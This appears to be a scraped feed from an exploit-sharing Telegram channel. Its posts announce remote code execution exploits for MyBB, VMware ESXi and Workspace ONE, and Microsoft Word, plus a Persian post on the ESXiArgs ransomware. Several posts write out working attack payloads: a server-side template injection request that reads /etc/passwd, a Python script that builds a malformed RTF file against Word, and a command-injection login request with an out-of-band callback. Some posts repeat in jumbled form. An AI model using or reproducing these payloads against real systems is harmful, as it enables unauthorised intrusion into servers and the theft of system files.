MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE)
Github
#LFI #RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#LFI #RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4👌3🫡2
0Day.Today | Learn Exploit | Zero World | Dark web |
اگر از VMware استفاده میکنید، این موج جدید حملات باج افزاری به سرورهای ESXi بانام ESXiArgs روجدی بگیرید! تنها در فرانسه ۲۵۰۰ سرور بااستفاده از یک آسیب پذیری شناخته شده هک شدند و چندین ارائه دهنده سرویسهای ابری هم قربانی شدند. از سال ۲۰۲۱ یک exploit این باگ…
POC for CVE-2021-21974 VMWare ESXi RCE Exploit
Read Here
Exploit
#RCE #POC #Exploit #VMware
——————
0Day.Today
@LearnExploit
@Tech_Army
Read Here
Exploit
#RCE #POC #Exploit #VMware
——————
0Day.Today
@LearnExploit
@Tech_Army
✍4❤🔥1
👍4
SSTI to RCE:
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
curl -X POST http://test.com:8080 -H "Cookie: token=eyJhbGciOiJI5cCI6Ikp.eyJ1c2VybmFtZSI6IndpemFyZC5vn0.YuW5qoU_-3FQ6q5wyFPw3PFlDHDOjuu2k" --data "name=name&desc={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}"
#SSTI #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5👍1
👍3🔥1🍾1
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC
#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
#CVE #RCE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
❤4👎1
CVE-2023-25135: Pre-authentication RCE
Github
#CVE #RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥5
CVE-2023-28311 ( Microsoft Word Remote Code Execution Vulnerability )
Github
#CVE #Windows #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Windows #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
👍5👎1
CVE-2022-22956 - CVE-2022-22957 ( VMware Workspace ONE RCE )
Link
#Exploit #CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#Exploit #CVE #RCE
——————
0Day.Today
@LearnExploit
@Tech_Army
packetstorm.news
Packet Storm
Information Security Services, News, Files, Tools, Exploits, Advisories, and Whitepapers
🔥3👍1🤯1
CVE-2022-44877
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
whoami
.{{interactsh-url}}) HTTP/1.1Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7❤1